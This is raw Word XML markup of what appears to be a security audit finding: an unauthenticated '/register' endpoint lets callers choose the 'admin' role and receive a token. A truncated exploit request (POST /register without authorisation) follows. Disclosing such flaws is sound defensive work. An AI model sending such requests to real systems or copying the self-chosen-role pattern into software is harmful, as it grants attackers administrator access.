                <v:shape id="Shape 347" o:spid="_x0000_s1027" style="position:absolute;top:2571;width:64801;height:7144;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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14xAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdWOVpqSuIlJhD1JaW3p+ZJ9JMPt2ya5J/PduodDjMDPfMOvtaFvRUxcaxwoW8wwE&#10;celMw5WC76/D4wuIEJENto5JwY0CbDeThzUWxg38Sf0pViJBOBSooI7RF1KGsiaLYe48cfLOrrMY&#10;k+wqaTocEty28inLnqXFhtNCjZ72NZWX09Uq6H/ej1kbztrnx3zQ2uvr24dWajYdd68gIo3xP/zX&#10;1kbBcpXD75l0BOTmDgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFqurXjEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,481,7290,1446l6480126,5029r,704311l6474764,712921v-2334,967,-4763,1451,-7290,1454l19050,714375v-2526,-3,-4956,-487,-7290,-1454c9426,711953,7366,710577,5580,708794,3793,707008,2417,704948,1450,702613l,695325,,19050,1450,11754c2417,9423,3793,7362,5580,5576,7366,3790,9426,2414,11760,1446,14094,481,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,714375"/>
                </v:shape>
                <v:rect id="Rectangle 408" o:spid="_x0000_s1028" style="position:absolute;top:183;width:736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68850180" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>Evidence.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 409" o:spid="_x0000_s1029" style="position:absolute;left:5542;top:183;width:438;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3D9DCCA6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 410" o:spid="_x0000_s1030" style="position:absolute;left:5905;width:10382;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="10382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ZrwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L/ocwghexqaKLVKNIYdldVsHVHjwOzdgWm0lpotZ/bw4LHh/ve7XpTC3u1LrKsoJJFIMgzq2u&#10;uFCQnT7HCxDOI2usLZOCJznYrPu9FSbaPviP7kdfiBDCLkEFpfdNIqXLSzLoItsQB+5iW4M+wLaQ&#10;usVHCDe1nMbxhzRYcWgosaG0pPx6vBkFX89TPJ3zGUd73qUu3R9+st+tUsNBt12C8NT5t/jf/a0V&#10;zCZhfjgTjoBcvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAbHXZrwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l1028700,v2630,,4875,930,6735,2787c1037295,4648,1038225,6894,1038225,9525r,114300c1038225,126454,1037295,128699,1035435,130556v-1860,1861,-4105,2791,-6735,2794l9525,133350v-2630,-3,-4875,-933,-6735,-2794c930,128699,,126454,,123825l,9525c,6894,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1038225,133350"/>
                </v:shape>
                <v:rect id="Rectangle 411" o:spid="_x0000_s1031" style="position:absolute;left:6142;top:236;width:13178;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6AD5210" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>routes/api.php:28</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 412" o:spid="_x0000_s1032" style="position:absolute;left:1007;top:4122;width:1159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319B4085" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>// Public Routes</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 413" o:spid="_x0000_s1033" style="position:absolute;left:1007;top:5836;width:4273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041ACB6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>Route::post(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>'/login</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 xml:space="preserve"> [</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>AuthController</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class, 'login']);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 414" o:spid="_x0000_s1034" style="position:absolute;left:1007;top:7551;width:4491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EA07210" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>Route::post(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>'/register', [</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>AuthController</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class, 'register']);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 415" o:spid="_x0000_s1035" style="position:absolute;top:11232;width:77658;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2ADDC606" w14:textId="6EFB95E9" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>Registered outside every middleware group. The controller then accepted the caller's own choice of privilege</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 416" o:spid="_x0000_s1036" style="position:absolute;top:12763;width:13335;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="13335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hqxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8gq91U38E23qKtKieCsawesj+5oEs2/j7lbTb98VhB6HmfkNs1j1phVXcr6xrCAdJiCI&#10;S6sbrhQci83rHIQPyBpby6TglzysloOnBeba3nhP10OoRISwz1FBHUKXS+nLmgz6oe2Io/dtncEQ&#10;paukdniLcNPKUZJk0mDDcaHGjj5qKs+HH6OAxuu3ZjvOpunOnc5fxexzdrkUSr089+t3EIH68B9+&#10;tHdawSTN4H4mHgG5/AMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCpyehqxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1323975,v2630,,4875,930,6735,2791c1332570,4651,1333500,6896,1333500,9525r,123825c1333500,135982,1332570,138224,1330710,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791l,133350,,9525,2790,2791c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1333500,142875"/>
                </v:shape>
                <v:rect id="Rectangle 417" o:spid="_x0000_s1037" style="position:absolute;left:269;top:13000;width:1705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132BF1E9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>AuthController.php:163</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 418" o:spid="_x0000_s1038" style="position:absolute;left:13363;top:12947;width:438;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5B86C730" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 419" o:spid="_x0000_s1039" style="position:absolute;left:13716;top:12763;width:22669;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="22669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T7xQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasMw&#10;EITvhbyD2EBujewS2sSNEkJJoIdAnZ/et9bWMrFWjqTG7ttXhUKPw8x8wyzXg23FjXxoHCvIpxkI&#10;4srphmsF59Pufg4iRGSNrWNS8E0B1qvR3RIL7Xo+0O0Ya5EgHApUYGLsCilDZchimLqOOHmfzluM&#10;Sfpaao99gttWPmTZo7TYcFow2NGLoepy/LIKrlfOS7Mf2vKtfO/3W/shfXhSajIeNs8gIg3xP/zX&#10;ftUKZvkCfs+kIyBXPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA06BT7xQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l2257425,v2630,,4875,930,6735,2791c2266020,4651,2266950,6896,2266950,9525r,123825c2266950,135982,2266020,138224,2264160,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135982,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2266950,142875"/>
                </v:shape>
                <v:rect id="Rectangle 420" o:spid="_x0000_s1040" style="position:absolute;left:13963;top:13000;width:29458;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6030252" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>'role' =&gt; '</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>required|</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>in:admin</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>,employee</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>'</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 421" o:spid="_x0000_s1041" style="position:absolute;left:36382;top:12947;width:15529;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5E467009" w14:textId="4A2FB91E" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">  wrote it through at </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 422" o:spid="_x0000_s1042" style="position:absolute;left:48101;top:12763;width:2857;height:1429;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QZLxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6sagpURXkapQD0JN9f7IPrPB7Ns0u8bYX98tFDwOM/MNM1/2thYdtb5yrGA8SkAQ&#10;F05XXCo4fm1f3kD4gKyxdkwK7uRhuRg8zTHT7sYH6vJQighhn6ECE0KTSekLQxb9yDXE0Tu71mKI&#10;si2lbvEW4baWaZK8SosVxwWDDb0bKi751SrYN3UV5HRz+d4fcnM/fa533fpHqedhv5qBCNSHR/i/&#10;/aEVTNIU/s7EIyAXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDJtQZLxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l276225,v2630,,4876,930,6735,2791c284820,4651,285750,6896,285750,9525r,123825c285750,135982,284820,138224,282960,140084v-1859,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135982,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
                <v:rect id="Rectangle 423" o:spid="_x0000_s1043" style="position:absolute;left:48328;top:13000;width:31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2519492F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>:227</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 424" o:spid="_x0000_s1044" style="position:absolute;left:50930;top:12947;width:16058;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67FD903" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>, and minted a token at</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 425" o:spid="_x0000_s1045" style="position:absolute;top:14477;width:2857;height:1429;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4/xQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RW81U1Fi0Q3IrVCexA0rfdH9pkNyb5Ns2uM/fVdoeBxmJlvmOVqsI3oqfOVYwUv4wQE&#10;ceF0xaWC76/t8xyED8gaG8ek4EoeVtnjwxJT7S58oD4PpYgQ9ikqMCG0qZS+MGTRj11LHL2T6yyG&#10;KLtS6g4vEW4bOUmSV2mx4rhgsKU3Q0Wdn62CXdtUQc7e65/dITfX437z2W9+lRo9DesFiEBDuIf/&#10;2x9awXQyg9uZeARk9gcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBGXJ4/xQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l276225,v2630,,4875,930,6735,2791c284820,4651,285750,6896,285750,9525r,123825c285750,135982,284820,138224,282960,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791l,133350,,9525,2790,2791c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,142875"/>
                </v:shape>
                <v:rect id="Rectangle 426" o:spid="_x0000_s1046" style="position:absolute;left:269;top:14714;width:31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695721FF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>:232</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 427" o:spid="_x0000_s1047" style="position:absolute;left:2870;top:14661;width:43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E2FD52D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 428" o:spid="_x0000_s1048" style="position:absolute;top:17328;width:2841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66808FE7" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>Exploit, executed against the original:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB80328" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0"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546FEBB4" wp14:editId="64B24E07">
                <wp:extent cx="6480126" cy="1504950"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="25691" name="Group 25691"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1504950"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1504950"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="348" name="Shape 348"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="1066800"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="1066800">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1448"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5034"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="1061769"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="1065349"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="1066316"/>
                                  <a:pt x="6470001" y="1066800"/>
                                  <a:pt x="6467474" y="1066800"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="1066800"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="1066800"/>
                                  <a:pt x="14094" y="1066316"/>
                                  <a:pt x="11760" y="1065349"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="1064382"/>
                                  <a:pt x="7366" y="1063005"/>
                                  <a:pt x="5580" y="1061222"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="1059433"/>
                                  <a:pt x="2417" y="1057374"/>
                                  <a:pt x="1450" y="1055040"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1047750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11757"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2417" y="9426"/>
                                  <a:pt x="3793" y="7367"/>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429" name="Rectangle 429"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="155029"/>
                            <a:ext cx="3694261" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="20EAF43B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>POST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 xml:space="preserve">/register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no Authorization header)</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="25440" name="Rectangle 25440"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="326479"/>
                            <a:ext cx="72437" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="021ECFA9"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25444" name="Rectangle 25444"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="155220" y="326479"/>
                            <a:ext cx="4853246" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7810E43C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>"</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
